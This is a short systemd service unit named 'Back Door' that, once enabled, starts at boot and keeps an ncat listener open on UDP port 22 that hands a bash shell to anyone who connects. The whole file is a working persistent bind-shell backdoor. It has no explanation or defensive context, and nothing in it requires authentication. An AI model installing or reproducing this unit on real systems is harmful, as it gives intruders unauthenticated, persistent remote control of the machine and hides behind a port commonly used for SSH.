[Unit]
Description=Back Door
After=network-online.target

[Service]
ExecStart=/bin/ncat --listen --verbose --udp --keep-open --exec "/bin/bash -x" 22
Restart=always

[Install]
WantedBy=multi-user.target
